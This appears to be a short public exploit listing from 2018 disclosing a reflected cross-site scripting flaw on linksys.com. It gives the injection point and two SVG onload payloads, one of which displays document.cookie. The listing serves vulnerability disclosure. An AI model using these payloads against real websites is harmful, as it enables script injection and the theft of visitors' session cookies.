Linksys.com Cross Site Scripting

Linksys.com suffers from a cross site scripting vulnerability.


MD5 | 89709b580c066b5a74071ecfb0cbdbab

# Exploit Title: [ Reflected XSS at Linksys ]
# Date: [ 02.06.2018 ]
# Exploit Author: [ Ismail Tasdelen ]
# Vendor Homepage: [ https://www.linksys.com/ ]
# Software Type : [ Website ]
# Software Version : [ N/A ]
# Vulenrability : [ Reflected Cross-site Scripting (XSS) ]
# Risk : [ Medium ]

# PoC :

Method : https://www.linksys.com/[country]/ + XSS Payload

XSS Payloads :

"><svg onload=alert('ismailtasdelen')>/

"><svg onload=alert(document.cookie)>/

Poc Video --> https://www.youtube.com/watch?v=CrRm7eSqSRI

# You want to follow my activity ?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://packetstormsecurity.com/user/ismailtasdelen

Related Posts